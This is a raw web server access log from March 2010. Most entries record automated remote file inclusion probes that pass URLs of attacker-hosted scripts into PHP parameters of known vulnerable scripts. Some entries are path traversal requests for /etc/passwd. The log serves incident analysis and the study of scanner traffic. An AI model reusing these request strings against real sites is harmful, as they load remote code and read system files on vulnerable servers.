219.94.194.248 - - [05/Mar/2010:08:42:49 -0800] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:08:45:12 -0800] "GET /logs/access_100226.log/admin.cropcanvas.php?cropimagedir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:08:47:27 -0800] "GET /logs/modify.php?dir_module=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:08:47:27 -0800] "GET /modify.php?dir_module=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:08:47:27 -0800] "GET /logs/access_100208.log%20%20/modify.php?dir_module=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:08:47:50 -0800] "GET /logs/access_100207.log%20%20/modify.php?dir_module=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:08:48:02 -0800] "GET /logs/access_100202.log%20%20/send_reminders.php?includedir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:08:48:02 -0800] "GET /logs/send_reminders.php?includedir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:08:48:02 -0800] "GET /send_reminders.php?includedir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:08:48:55 -0800] "GET /logs/access_100208.log/modify.php?dir_module=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:08:48:55 -0800] "GET /modify.php?dir_module=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:08:48:58 -0800] "GET /logs/modify.php?dir_module=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:08:49:07 -0800] "GET /logs/access_100207.log/modify.php?dir_module=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.115.233 - - [05/Mar/2010:08:50:27 -0800] "GET /pnetsite/fav.ico HTTP/1.0" 200 1406 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.pixero.net"
219.94.193.152 - - [05/Mar/2010:08:50:34 -0800] "GET /logs/send_reminders.php?includedir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:08:50:35 -0800] "GET /logs/access_100202.log%20%20/send_reminders.php?includedir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:08:50:35 -0800] "GET /send_reminders.php?includedir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:08:52:59 -0800] "GET /logs/access_100208.log/modify.php?dir_module=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:08:52:59 -0800] "GET /modify.php?dir_module=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:08:52:59 -0800] "GET /logs/modify.php?dir_module=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:08:53:13 -0800] "GET /logs/access_100207.log/modify.php?dir_module=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [05/Mar/2010:08:53:24 -0800] "GET /logs/access_100129.log//main.php?sayfa=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [05/Mar/2010:08:53:33 -0800] "GET /logs/access_100220.log//main.php?sayfa=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:08:55:55 -0800] "GET /modify.php?dir_module=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:08:55:55 -0800] "GET /logs/modify.php?dir_module=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:08:55:55 -0800] "GET /logs/access_100208.log%20%20/modify.php?dir_module=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:08:56:16 -0800] "GET /logs/access_100207.log%20%20/modify.php?dir_module=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:08:56:42 -0800] "GET /logs/access_100209.log///appserv/main.php?appserv_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:08:56:42 -0800] "GET /logs/access_100126.log///appserv/main.php?appserv_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:08:56:43 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:08:56:43 -0800] "GET //appserv/main.php?appserv_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:09:00:18 -0800] "GET /logs/access_100213.log//errors.php?error=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:09:00:18 -0800] "GET /errors.php?error=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:09:00:18 -0800] "GET /logs//errors.php?error=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:09:00:20 -0800] "GET /errors.php?error=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:09:00:20 -0800] "GET /logs/access_100213.log//errors.php?error=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:09:00:20 -0800] "GET /logs//errors.php?error=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:09:00:39 -0800] "GET /logs/access_100215.log//errors.php?error=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:09:00:39 -0800] "GET /logs/access_100215.log//errors.php?error=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.111.95.42 - - [05/Mar/2010:09:02:45 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.puaga.com"
193.111.95.42 - - [05/Mar/2010:09:02:45 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.puaga.com"
78.24.9.88 - - [05/Mar/2010:09:04:48 -0800] "GET /logs/access_100202.log/send_reminders.php?includedir=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:09:05:12 -0800] "GET /logs/access_100126.log%20%20///appserv/main.php?appserv_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:09:05:12 -0800] "GET //appserv/main.php?appserv_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:09:05:12 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.24.9.88 - - [05/Mar/2010:09:05:27 -0800] "GET /logs/access_100215.log/send_reminders.php?includedir=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:09:05:33 -0800] "GET /logs/access_100220.log%20%20///appserv/main.php?appserv_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:09:05:44 -0800] "GET /logs/access_100131.log//bbs//apply_vote.php///?_zb_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:09:05:44 -0800] "GET /bbs//apply_vote.php///?_zb_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:09:05:44 -0800] "GET /logs//bbs//apply_vote.php///?_zb_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:09:06:00 -0800] "GET /logs/access_100213.log//bbs//apply_vote.php///?_zb_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:09:08:01 -0800] "GET /logs/access_100205.log//delete_all.php?board_skin_path=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:09:08:01 -0800] "GET /delete_all.php?board_skin_path=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:09:08:01 -0800] "GET /logs//delete_all.php?board_skin_path=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:09:08:16 -0800] "GET /logs/access_100203.log//delete_all.php?board_skin_path=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:09:09:06 -0800] "GET /logs/access_100208.log/modify.php?dir_module=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:09:09:15 -0800] "GET /logs/access_100207.log/modify.php?dir_module=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.225.243.237 - - [05/Mar/2010:09:10:21 -0800] "GET /logs/access_100224.log/main.php?pagina=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
67.225.243.237 - - [05/Mar/2010:09:10:21 -0800] "GET /main.php?pagina=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
67.225.243.237 - - [05/Mar/2010:09:10:21 -0800] "GET /logs/main.php?pagina=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
67.225.243.237 - - [05/Mar/2010:09:10:52 -0800] "GET /logs/access_100225.log/main.php?pagina=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
81.227.122.254 - - [05/Mar/2010:09:13:14 -0800] "GET / HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)" "www.puaga.com"
81.227.122.254 - - [05/Mar/2010:09:13:14 -0800] "GET /style/pngHack.css HTTP/1.1" 200 42 "http://www.puaga.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)" "www.puaga.com"
81.227.122.254 - - [05/Mar/2010:09:13:14 -0800] "GET /style/5.style.css HTTP/1.1" 200 2407 "http://www.puaga.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)" "www.puaga.com"
81.227.122.254 - - [05/Mar/2010:09:13:15 -0800] "GET /style/imagehover.js HTTP/1.0" 200 1410 "http://www.puaga.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)" "www.puaga.com"
81.227.122.254 - - [05/Mar/2010:09:13:15 -0800] "GET /images/TL_Home.png HTTP/1.1" 200 5012 "http://www.puaga.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)" "www.puaga.com"
81.227.122.254 - - [05/Mar/2010:09:13:15 -0800] "GET /images/TL_Home_Hover.png HTTP/1.1" 200 5160 "http://www.puaga.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)" "www.puaga.com"
81.227.122.254 - - [05/Mar/2010:09:13:15 -0800] "GET /images/TL_AkifBar.png HTTP/1.1" 200 4614 "http://www.puaga.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)" "www.puaga.com"
81.227.122.254 - - [05/Mar/2010:09:13:15 -0800] "GET /images/TL_Pixero_Hover.png HTTP/1.0" 200 4643 "http://www.puaga.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)" "www.puaga.com"
81.227.122.254 - - [05/Mar/2010:09:13:15 -0800] "GET /images/TL_Diger.png HTTP/1.1" 200 4637 "http://www.puaga.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)" "www.puaga.com"
81.227.122.254 - - [05/Mar/2010:09:13:15 -0800] "GET /images/TL_Diger_Hover.png HTTP/1.1" 200 4675 "http://www.puaga.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)" "www.puaga.com"
81.227.122.254 - - [05/Mar/2010:09:13:15 -0800] "GET /style/pngHack.htc HTTP/1.1" 200 1320 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)" "www.puaga.com"
81.227.122.254 - - [05/Mar/2010:09:13:15 -0800] "GET /images/TL_Pixero.png HTTP/1.1" 200 4545 "http://www.puaga.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)" "www.puaga.com"
81.227.122.254 - - [05/Mar/2010:09:13:15 -0800] "GET /images/TL_Simple_Hover.png HTTP/1.1" 200 4805 "http://www.puaga.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)" "www.puaga.com"
81.227.122.254 - - [05/Mar/2010:09:13:15 -0800] "GET /images/TL_Simple.png HTTP/1.1" 200 4682 "http://www.puaga.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)" "www.puaga.com"
81.227.122.254 - - [05/Mar/2010:09:13:15 -0800] "GET /images/TL_AkifBar_Hover.png HTTP/1.1" 200 4767 "http://www.puaga.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)" "www.puaga.com"
81.227.122.254 - - [05/Mar/2010:09:13:16 -0800] "GET /style/pngHack.htc HTTP/1.1" 200 1320 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)" "www.puaga.com"
81.227.122.254 - - [05/Mar/2010:09:13:16 -0800] "GET /images/PuagaSubLink_38472394873298.png HTTP/1.1" 200 8153 "http://www.puaga.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)" "www.puaga.com"
81.227.122.254 - - [05/Mar/2010:09:13:16 -0800] "GET /images/logo.png HTTP/1.1" 200 11323 "http://www.puaga.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)" "www.puaga.com"
81.227.122.254 - - [05/Mar/2010:09:13:16 -0800] "GET /images/PuagaSubLink_38472394873299.png HTTP/1.1" 200 33762 "http://www.puaga.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)" "www.puaga.com"
81.227.122.254 - - [05/Mar/2010:09:13:16 -0800] "GET /images/puaga.com_main.09482309483291.png HTTP/1.1" 200 154201 "http://www.puaga.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)" "www.puaga.com"
81.227.122.254 - - [05/Mar/2010:09:13:16 -0800] "GET /images/PageBackSwills.jpg HTTP/1.1" 200 41348 "http://www.puaga.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:09:13:16 -0800] "GET /logs/access_100205.log%20%20//delete_all.php?board_skin_path=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:09:13:16 -0800] "GET /logs//delete_all.php?board_skin_path=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:09:13:16 -0800] "GET /delete_all.php?board_skin_path=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.227.122.254 - - [05/Mar/2010:09:13:17 -0800] "GET /favicon.ico HTTP/1.1" 200 1406 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)" "www.puaga.com"
99.57.90.154 - - [05/Mar/2010:09:13:39 -0800] "GET /logs/access_100209.log%20%20//include/engine/content/elements/menu.php?%20CONFIG[AdminPath]=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.250.255.242 - - [05/Mar/2010:09:13:39 -0800] "GET /logs/access_091126.log HTTP/1.1" 404 5258 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:09:13:48 -0800] "GET /logs/access_100203.log%20%20//delete_all.php?board_skin_path=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.148.66 - - [05/Mar/2010:09:15:11 -0800] "GET /logs/access_100218.log/////?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.148.66 - - [05/Mar/2010:09:15:11 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.puaga.com"
211.230.148.66 - - [05/Mar/2010:09:15:11 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
79.174.73.50 - - [05/Mar/2010:09:15:47 -0800] "GET /logs/s_auth.inc.php?_SERVER[DOCUMENT_ROOT]=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.833" "www.puaga.com"
79.174.73.50 - - [05/Mar/2010:09:15:47 -0800] "GET /s_auth.inc.php?_SERVER[DOCUMENT_ROOT]=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.833" "www.puaga.com"
66.7.222.43 - - [05/Mar/2010:09:16:26 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.equitropic.com//portal/includes/js/ts????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.puaga.com"
66.7.222.43 - - [05/Mar/2010:09:16:26 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.equitropic.com//portal/includes/js/ts????? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.puaga.com"
211.230.148.66 - - [05/Mar/2010:09:16:39 -0800] "GET /logs/access_100207.log/////?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [05/Mar/2010:09:17:39 -0800] "GET /logs/access_100214.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [05/Mar/2010:09:17:39 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [05/Mar/2010:09:17:39 -0800] "GET /logs/access_100130.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [05/Mar/2010:09:17:40 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [05/Mar/2010:09:17:48 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [05/Mar/2010:09:17:48 -0800] "GET /logs/access_100203.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [05/Mar/2010:09:17:48 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
